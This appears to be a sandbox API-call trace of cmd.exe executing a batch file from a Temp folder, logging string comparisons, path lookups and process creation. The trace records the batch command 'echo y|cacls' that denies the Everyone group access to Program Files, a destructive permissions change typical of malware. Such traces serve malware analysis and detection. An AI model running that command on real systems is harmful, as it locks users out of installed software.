(LangId=0x0) returned 0x409 [0036.423] CreateFileW (lpFileName="C:\\Users\\5JGHKO~1\\AppData\\Local\\Temp\\CCEP00EL.bat" (normalized: "c:\\users\\5jghko~1\\appdata\\local\\temp\\ccep00el.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0xc8f200, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x8c [0036.423] _open_osfhandle (_OSFileHandle=0x8c, _Flags=8) returned 3 [0036.423] _get_osfhandle (_FileHandle=3) returned 0x8c [0036.423] SetFilePointer (in: hFile=0x8c, lDistanceToMove=1103, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x44f [0036.423] SetFilePointer (in: hFile=0x8c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x44f [0036.423] ReadFile (in: hFile=0x8c, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0xc8f1c4, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8f1c4*=0x61f, lpOverlapped=0x0) returned 1 [0036.423] SetFilePointer (in: hFile=0x8c, lDistanceToMove=1155, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x483 [0036.423] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=52, lpWideCharStr=0x12bc840, cchWideChar=8191 | out: lpWideCharStr="echo y|cacls \"C:\\Program Files\\*.*\" /e /d everyone\r\nd everyone\r\n\n\r\n=%%i\r\n") returned 52 [0036.423] GetFileType (hFile=0x8c) returned 0x1 [0036.423] _get_osfhandle (_FileHandle=3) returned 0x8c [0036.423] SetFilePointer (in: hFile=0x8c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x483 [0036.423] _wcsicmp (_String1="echo", _String2=")") returned 60 [0036.423] _wcsicmp (_String1="FOR", _String2="echo") returned 1 [0036.423] _wcsicmp (_String1="FOR/?", _String2="echo") returned 1 [0036.423] _wcsicmp (_String1="IF", _String2="echo") returned 4 [0036.423] _wcsicmp (_String1="IF/?", _String2="echo") returned 4 [0036.423] _wcsicmp (_String1="REM", _String2="echo") returned 13 [0036.423] _wcsicmp (_String1="REM/?", _String2="echo") returned 13 [0036.423] _wcsicmp (_String1="FOR", _String2="cacls") returned 3 [0036.423] _wcsicmp (_String1="FOR/?", _String2="cacls") returned 3 [0036.424] _wcsicmp (_String1="IF", _String2="cacls") returned 6 [0036.424] _wcsicmp (_String1="IF/?", _String2="cacls") returned 6 [0036.424] _wcsicmp (_String1="REM", _String2="cacls") returned 15 [0036.424] _wcsicmp (_String1="REM/?", _String2="cacls") returned 15 [0036.424] _tell (_FileHandle=3) returned 1155 [0036.424] _close (_FileHandle=3) returned 0 [0036.424] _pipe (in: _PtHandles=0xd260f0, _PipeSize=0x0, _TextMode=32768 | out: _PtHandles=0xd260f0) returned 0 [0036.424] _dup (_FileHandle=1) returned 5 [0036.424] _dup2 (_FileHandleSrc=4, _FileHandleDst=1) returned 0 [0036.424] _close (_FileHandle=4) returned 0 [0036.424] _wcsicmp (_String1="echo", _String2="DIR") returned 1 [0036.424] _wcsicmp (_String1="echo", _String2="ERASE") returned -15 [0036.424] _wcsicmp (_String1="echo", _String2="DEL") returned 1 [0036.424] _wcsicmp (_String1="echo", _String2="TYPE") returned -15 [0036.424] _wcsicmp (_String1="echo", _String2="COPY") returned 2 [0036.424] _wcsicmp (_String1="echo", _String2="CD") returned 2 [0036.424] _wcsicmp (_String1="echo", _String2="CHDIR") returned 2 [0036.424] _wcsicmp (_String1="echo", _String2="RENAME") returned -13 [0036.424] _wcsicmp (_String1="echo", _String2="REN") returned -13 [0036.424] _wcsicmp (_String1="echo", _String2="ECHO") returned 0 [0036.424] _wcsicmp (_String1="echo", _String2="DIR") returned 1 [0036.424] _wcsicmp (_String1="echo", _String2="ERASE") returned -15 [0036.424] _wcsicmp (_String1="echo", _String2="DEL") returned 1 [0036.424] _wcsicmp (_String1="echo", _String2="TYPE") returned -15 [0036.424] _wcsicmp (_String1="echo", _String2="COPY") returned 2 [0036.424] _wcsicmp (_String1="echo", _String2="CD") returned 2 [0036.424] _wcsicmp (_String1="echo", _String2="CHDIR") returned 2 [0036.424] _wcsicmp (_String1="echo", _String2="RENAME") returned -13 [0036.424] _wcsicmp (_String1="echo", _String2="REN") returned -13 [0036.424] _wcsicmp (_String1="echo", _String2="ECHO") returned 0 [0036.424] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0036.424] _wcsnicmp (_String1="C:\\W", _String2="cmd ", _MaxCount=0x4) returned -51 [0036.424] SetErrorMode (uMode=0x0) returned 0x0 [0036.424] SetErrorMode (uMode=0x1) returned 0x0 [0036.425] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\.", nBufferLength=0x208, lpBuffer=0xd18250, lpFilePart=0xc8ecc4 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0xc8ecc4*="system32") returned 0x13 [0036.425] SetErrorMode (uMode=0x0) returned 0x1 [0036.425] NeedCurrentDirectoryForExePathW (ExeName="C:\\Windows\\system32\\.") returned 1 [0036.425] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0036.425] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0036.425] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\cmd.exe", fInfoLevelId=0x1, lpFindFileData=0xc8ea70, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xc8ea70) returned 0xd18390 [0036.425] FindClose (in: hFindFile=0xd18390 | out: hFindFile=0xd18390) returned 1 [0036.425] _wcsicmp (_String1=".exe", _String2=".CMD") returned 2 [0036.425] _wcsicmp (_String1=".exe", _String2=".BAT") returned 3 [0036.425] GetConsoleTitleW (in: lpConsoleTitle=0xc8ef4c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\SYSTEM32\\cmd.exe") returned 0x1b [0036.425] InitializeProcThreadAttributeList (in: lpAttributeList=0xc8ee78, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0xc8ee5c | out: lpAttributeList=0xc8ee78, lpSize=0xc8ee5c) returned 1 [0036.425] UpdateProcThreadAttribute (in: lpAttributeList=0xc8ee78, dwFlags=0x0, Attribute=0x60001, lpValue=0xc8ee64, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0xc8ee78, lpPreviousValue=0x0) returned 1 [0036.425] GetStartupInfoW (in: lpStartupInfo=0xc8eeb0 | out: lpStartupInfo=0xc8eeb0*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\SYSTEM32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0036.425] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0036.425] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0036.425] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0036.425] _wcsnicmp (_String1="COPYCMD", _String2="cmdln=", _MaxCount=0x7) returned 2 [0036.425] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0036.425] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0036.425] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0036.425] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0036.425] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0036.425] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0036.425] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0036.425] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0036.425] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0036.425] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0036.425] _wcsnicmp (_String1="COPYCMD", _String2="MYFILES", _MaxCount=0x7) returned -10 [0036.425] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0036.425] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0036.425] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0036.426] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0036.426] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0036.426] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0036.426] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0036.426] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0036.426] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0036.426] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0036.426] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0036.426] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0036.426] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0036.426] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0036.426] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0036.426] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0036.426] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0036.426] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0036.426] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0036.426] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0036.426] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0036.426] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0036.426] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0036.426] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0036.426] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0036.426] lstrcmpW (lpString1="\\cmd.exe", lpString2="\\XCOPY.EXE") returned -1 [0036.426] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\cmd.exe", lpCommandLine="C:\\Windows\\system32\\cmd.exe /S /D /c\" echo y\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5JgHKoaOfdp\\Desktop", lpStartupInfo=0xc8ee00*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe /S /D /c\" echo y\"", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0xc8ee4c | out: lpCommandLine="C:\\Windows\\system32\\cmd.exe /S /D /c\" echo y\"", lpProcessInformation=0xc8ee4c*(hProcess=0x80, hThread=0x94, dwProcessId=0xbd8, dwThreadId=0xbdc)) returned 1 [0036.430] CloseHandle (hObject=0x94) returned 1 [0036.430] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0036.430] GetEnvironmentStringsW () returned 0xd15f98* [0036.430] FreeEnvironmentStringsA (penv="=") returned 1 [0036.430] DeleteProcThreadAttributeList (in: lpAttributeList=0xc8ee78 | out: lpAttributeList=0xc8ee78) [0036.430] _get_osfhandle (_FileHandle=3) returned 0x8c [0036.430] DuplicateHandle (in: hSourceProcessHandle=0x80, hSourceHandle=0x8c, hTargetProcessHandle=0x0, lpTargetHandle=0x0, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x1 | out: lpTargetHandle=0x0) returned 1 [0036.430] _dup2 (_FileHandleSrc=5, _FileHandleDst=1) returned 0 [0036.430] _close (_FileHandle=5) returned 0 [0036.430] _dup (_FileHandle=0) returned 4 [0036.430] _dup2 (_FileHandleSrc=3, _FileHandleDst=0) returned 0 [0036.430] _close (_FileHandle=3) returned 0 [0036.430] _wcsicmp (_String1="cacls", _String2="DIR") returned -1 [0036.430] _wcsicmp (_String1="cacls", _String2="ERASE") returned -2 [0036.430] _wcsicmp (_String1="cacls", _String2="DEL") returned -1 [0036.430] _wcsicmp (_String1="cacls", _String2="TYPE") returned -17 [0036.430] _wcsicmp (_String1="cacls", _String2="COPY") returned -14 [0036.431] _wcsicmp (_String1="cacls", _String2="CD") returned -3 [0036.431] _wcsicmp (_String1="cacls", _String2="CHDIR") returned -7 [0036.431] _wcsicmp (_String1="cacls", _String2="RENAME") returned -15 [0036.431] _wcsicmp (_String1="cacls", _String2="REN") returned -15 [0036.431] _wcsicmp (_String1="cacls", _String2="ECHO") returned -2 [0036.431] _wcsicmp (_String1="cacls", _String2="SET") returned -16 [0036.431] _wcsicmp (_String1="cacls", _String2="PAUSE") returned -13 [0036.431] _wcsicmp (_String1="cacls", _String2="DATE") returned -1 [0036.431] _wcsicmp (_String1="cacls", _String2="TIME") returned -17 [0036.431] _wcsicmp (_String1="cacls", _String2="PROMPT") returned -13 [0036.431] _wcsicmp (_String1="cacls", _String2="MD") returned -10 [0036.431] _wcsicmp (_String1="cacls", _String2="MKDIR") returned -10 [0036.431] _wcsicmp (_String1="cacls", _String2="RD") returned -15 [0036.431] _wcsicmp (_String1="cacls", _String2="RMDIR") returned -15 [0036.431] _wcsicmp (_String1="cacls", _String2="PATH") returned -13 [0036.431] _wcsicmp (_String1="cacls", _String2="GOTO") returned -4 [0036.431] _wcsicmp (_String1="cacls", _String2="SHIFT") returned -16 [0036.431] _wcsicmp (_String1="cacls", _String2="CLS") returned -11 [0036.431] _wcsicmp (_String1="cacls", _String2="CALL") returned -9 [0036.431] _wcsicmp (_String1="cacls", _String2="VERIFY") returned -19 [0036.431] _wcsicmp (_String1="cacls", _String2="VER") returned -19 [0036.431] _wcsicmp (_String1="cacls", _String2="VOL") returned -19 [0036.431] _wcsicmp (_String1="cacls", _String2="EXIT") returned -2 [0036.431] _wcsicmp (_String1="cacls", _String2="SETLOCAL") returned -16 [0036.431] _wcsicmp (_String1="cacls", _String2="ENDLOCAL") returned -2 [0036.431] _wcsicmp (_String1="cacls", _String2="TITLE") returned -17 [0036.431] _wcsicmp (_String1="cacls", _String2="START") returned -16 [0036.431] _wcsicmp (_String1="cacls", _String2="DPATH") returned -1 [0036.431] _wcsicmp (_String1="cacls", _String2="KEYS") returned -8 [0036.431] _wcsicmp (_String1="cacls", _String2="MOVE") returned -10 [0036.431] _wcsicmp (_String1="cacls", _String2="PUSHD") returned -13 [0036.431] _wcsicmp (_String1="cacls", _String2="POPD") returned -13 [0036.431] _wcsicmp (_String1="cacls", _String2="ASSOC") returned 2 [0036.431] _wcsicmp (_String1="cacls", _String2="FTYPE") returned -3 [0036.431] _wcsicmp (_String1="cacls", _String2="BREAK") returned 1 [0036.431] _wcsicmp (_String1="cacls", _String2="COLOR") returned -14 [0036.431] _wcsicmp (_String1="cacls", _String2="MKLINK") returned -10 [0036.431] _wcsicmp (_String1="cacls", _String2="DIR") returned -1 [0036.431] _wcsicmp (_String1="cacls", _String2="ERASE") returned -2 [0036.431] _wcsicmp (_String1="cacls", _String2="DEL") returned -1 [0036.431] _wcsicmp (_String1="cacls", _String2="TYPE") returned -17 [0036.431] _wcsicmp (_String1="cacls", _String2="COPY") returned -14 [0036.431] _wcsicmp (_String1="cacls", _String2="CD") returned -3 [0036.431] _wcsicmp (_String1="cacls", _String2="CHDIR") returned -7 [0036.431] _wcsicmp (_String1="cacls", _String2="RENAME") returned -15 [0036.431] _wcsicmp (_String1="cacls", _String2="REN") returned -15 [0036.431] _wcsicmp (_String1="cacls", _String2="ECHO") returned -2 [0036.431] _wcsicmp (_String1="cacls", _String2="SET") returned -16 [0036.431] _wcsicmp (_String1="cacls", _String2="PAUSE") returned -13 [0036.431] _wcsicmp (_String1="cacls", _String2="DATE") returned -1 [0036.431] _wcsicmp (_String1="cacls", _String2="TIME") returned -17 [0036.431] _wcsicmp (_String1="cacls", _String2="PROMPT") returned -13 [0036.431] _wcsicmp (_String1="cacls", _String2="MD") returned -10 [0036.431] _wcsicmp (_String1="cacls", _String2="MKDIR") returned -10 [0036.431] _wcsicmp (_String1="cacls", _String2="RD") returned -15 [0036.431] _wcsicmp (_String1="cacls", _String2="RMDIR") returned -15 [0036.432] _wcsicmp (_String1="cacls", _String2="PATH") returned -13 [0036.432] _wcsicmp (_String1="cacls", _String2="GOTO") returned -4 [0036.432] _wcsicmp (_String1="cacls", _String2="SHIFT") returned -16 [0036.432] _wcsicmp (_String1="cacls", _String2="CLS") returned -11 [0036.432] _wcsicmp (_String1="cacls", _String2="CALL") returned -9 [0036.432] _wcsicmp (_String1="cacls", _String2="VERIFY") returned -19 [0036.432] _wcsicmp (_String1="cacls", _String2="VER") returned -19 [0036.432] _wcsicmp (_String1="cacls", _String2="VOL") returned -19 [0036.432] _wcsicmp (_String1="cacls", _String2="EXIT") returned -2 [0036.432] _wcsicmp (_String1="cacls", _String2="SETLOCAL") returned -16 [0036.432] _wcsicmp (_String1="cacls", _String2="ENDLOCAL") returned -2 [0036.432] _wcsicmp (_String1="cacls", _String2="TITLE") returned -17 [0036.432] _wcsicmp (_String1="cacls", _String2="START") returned -16 [0036.432] _wcsicmp (_String1="cacls", _String2="DPATH") returned -1 [0036.432] _wcsicmp (_String1="cacls", _String2="KEYS") returned -8 [0036.432] _wcsicmp (_String1="cacls", _String2="MOVE") returned -10 [0036.432] _wcsicmp (_String1="cacls", _String2="PUSHD") returned -13 [0036.432] _wcsicmp (_String1="cacls", _String2="POPD") returned -13 [0036.432] _wcsicmp (_String1="cacls", _String2="ASSOC") returned 2 [0036.432] _wcsicmp (_String1="cacls", _String2="FTYPE") returned -3 [0036.432] _wcsicmp (_String1="cacls", _String2="BREAK") returned 1 [0036.432] _wcsicmp (_String1="cacls", _String2="COLOR") returned -14 [0036.432] _wcsicmp (_String1="cacls", _String2="MKLINK") returned -10 [0036.432] _wcsicmp (_String1="cacls", _String2="FOR") returned -3 [0036.432] _wcsicmp (_String1="cacls", _String2="IF") returned -6 [0036.432] _wcsicmp (_String1="cacls", _String2="REM") returned -15 [0036.432] _wcsicmp (_String1="cacls", _String2="DIR") returned -1 [0036.432] _wcsicmp (_String1="cacls", _String2="ERASE") returned -2 [0036.432] _wcsicmp (_String1="cacls", _String2="DEL") returned -1 [0036.432] _wcsicmp (_String1="cacls", _String2="TYPE") returned -17 [0036.432] _wcsicmp (_String1="cacls", _String2="COPY") returned -14 [0036.432] _wcsicmp (_String1="cacls", _String2="CD") returned -3 [0036.432] _wcsicmp (_String1="cacls", _String2="CHDIR") returned -7 [0036.432] _wcsicmp (_String1="cacls", _String2="RENAME") returned -15 [0036.432] _wcsicmp (_String1="cacls", _String2="REN") returned -15 [0036.432] _wcsicmp (_String1="cacls", _String2="ECHO") returned -2 [0036.432] _wcsicmp (_String1="cacls", _String2="SET") returned -16 [0036.432] _wcsicmp (_String1="cacls", _String2="PAUSE") returned -13 [0036.432] _wcsicmp (_String1="cacls", _String2="DATE") returned -1 [0036.432] _wcsicmp (_String1="cacls", _String2="TIME") returned -17 [0036.432] _wcsicmp (_String1="cacls", _String2="PROMPT") returned -13 [0036.432] _wcsicmp (_String1="cacls", _String2="MD") returned -10 [0036.432] _wcsicmp (_String1="cacls", _String2="MKDIR") returned -10 [0036.432] _wcsicmp (_String1="cacls", _String2="RD") returned -15 [0036.432] _wcsicmp (_String1="cacls", _String2="RMDIR") returned -15 [0036.432] _wcsicmp (_String1="cacls", _String2="PATH") returned -13 [0036.432] _wcsicmp (_String1="cacls", _String2="GOTO") returned -4 [0036.432] _wcsicmp (_String1="cacls", _String2="SHIFT") returned -16 [0036.432] _wcsicmp (_String1="cacls", _String2="CLS") returned -11 [0036.433] _wcsicmp (_String1="cacls", _String2="CALL") returned -9 [0036.433] _wcsicmp (_String1="cacls", _String2="VERIFY") returned -19 [0036.433] _wcsicmp (_String1="cacls", _String2="VER") returned -19 [0036.433] _wcsicmp (_String1="cacls", _String2="VOL") returned -19 [0036.433] _wcsicmp (_String1="cacls", _String2="EXIT") returned -2 [0036.433] _wcsicmp (_String1="cacls", _String2="SETLOCAL") returned -16 [0036.433] _wcsicmp (_String1="cacls", _String2="ENDLOCAL") returned -2 [0036.433] _wcsicmp (_String1="cacls", _String2="TITLE") returned -17 [0036.433] _wcsicmp (_String1="cacls", _String2="START") returned -16 [0036.433] _wcsicmp (_String1="cacls", _String2="DPATH") returned -1 [0036.433] _wcsicmp (_String1="cacls", _String2="KEYS") returned -8 [0036.433] _wcsicmp (_String1="cacls", _String2="MOVE") returned -10 [0036.433] _wcsicmp (_String1="cacls", _String2="PUSHD") returned -13 [0036.433] _wcsicmp (_String1="cacls", _String2="POPD") returned -13 [0036.433] _wcsicmp (_String1="cacls", _String2="ASSOC") returned 2 [0036.433] _wcsicmp (_String1="cacls", _String2="FTYPE") returned -3 [0036.433] _wcsicmp (_String1="cacls", _String2="BREAK") returned 1 [0036.433] _wcsicmp (_String1="cacls", _String2="COLOR") returned -14 [0036.433] _wcsicmp (_String1="cacls", _String2="MKLINK") returned -10 [0036.433] _wcsnicmp (_String1="cacl", _String2="cmd ", _MaxCount=0x4) returned -12 [0036.433] SetErrorMode (uMode=0x0) returned 0x0 [0036.433] SetErrorMode (uMode=0x1) returned 0x0 [0036.433] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0xd1baf0, lpFilePart=0xc8ef1c | out: lpBuffer="C:\\Users\\5JgHKoaOfdp\\Desktop", lpFilePart=0xc8ef1c*="Desktop") returned 0x1c [0036.433] SetErrorMode (uMode=0x0) returned 0x1 [0036.433] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0036.433] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0036.433] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0036.433] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0036.433] FindFirstFileExW (in: lpFileName="C:\\Users\\5JgHKoaOfdp\\Desktop\\cacls.*", fInfoLevelId=0x1, lpFindFileData=0xc8eca8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xc8eca8) returned 0xffffffff [0036.433] GetLastError () returned 0x2 [0036.433] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0036.433] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\cacls.*", fInfoLevelId=0x1, lpFindFileData=0xc8eca8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xc8eca8) returned 0xd18528 [0036.433] FindClose (in: hFindFile=0xd18528 | out: hFindFile=0xd18528) returned 1 [0036.434] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\cacls.COM", fInfoLevelId=0x1, lpFindFileData=0xc8eca8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xc8eca8) returned 0xffffffff [0036.434] GetLastError () returned 0x2 [0036.434] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\cacls.EXE", fInfoLevelId=0x1, lpFindFileData=0xc8eca8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xc8eca8) returned 0xd18528 [0036.434] FindClose (in: hFindFile=0xd18528 | out: hFindFile=0xd18528) returned 1 [0036.434] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0036.434] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0036.434] _wcsnicmp (_String1="cacl", _String2="cmd ", _MaxCount=0x4) returned -12 [0036.434] SetErrorMode (uMode=0x0) returned 0x0 [0036.434] SetErrorMode (uMode=0x1) returned 0x0 [0036.434] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0xd15fa0, lpFilePart=0xc8ecc4 | out: lpBuffer="C:\\Users\\5JgHKoaOfdp\\Desktop", lpFilePart=0xc8ecc4*="Desktop") returned 0x1c [0036.434] SetErrorMode (uMode=0x0) returned 0x1 [0036.434] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0036.434] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0036.434] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0036.434] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0036.434] FindFirstFileExW (in: lpFileName="C:\\Users\\5JgHKoaOfdp\\Desktop\\cacls.*", fInfoLevelId=0x1, lpFindFileData=0xc8ea50, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xc8ea50) returned 0xffffffff [0036.434] GetLastError () returned 0x2 [0036.434] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0036.434] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\cacls.*", fInfoLevelId=0x1, lpFindFileData=0xc8ea50, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xc8ea50) returned 0xd1bef0 [0036.434] FindClose (in: hFindFile=0xd1bef0 | out: hFindFile=0xd1bef0) returned 1 [0036.434] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\cacls.COM", fInfoLevelId=0x1, lpFindFileData=0xc8ea50, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xc8ea50) returned 0xffffffff [0036.435] GetLastError () returned 0x2 [0036.435] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\cacls.EXE", fInfoLevelId=0x1, lpFindFileData=0xc8ea50, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xc8ea50) returned 0xd1bef0 [0036.435] FindClose (in: hFindFile=0xd1bef0 | out: hFindFile=0xd1bef0) returned 1 [0036.435] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0036.435] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0036.435] GetConsoleTitleW (in: lpConsoleTitle=0xc8ef4c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\SYSTEM32\\cmd.exe") returned 0x1b [0036.435] InitializeProcThreadAttributeList (in: lpAttributeList=0xc8ee78, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0xc8ee5c | out: lpAttributeList=0xc8ee78, lpSize=0xc8ee5c) returned 1 [0036.435] UpdateProcThreadAttribute (in: lpAttributeList=0xc8ee78, dwFlags=0x0, Attribute=0x60001, lpValue=0xc8ee64, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0xc8ee78, lpPreviousValue=0x0) returned 1 [0036.435] GetStartupInfoW (in: lpStartupInfo=0xc8eeb0 | out: lpStartupInfo=0xc8eeb0*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\SYSTEM32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, 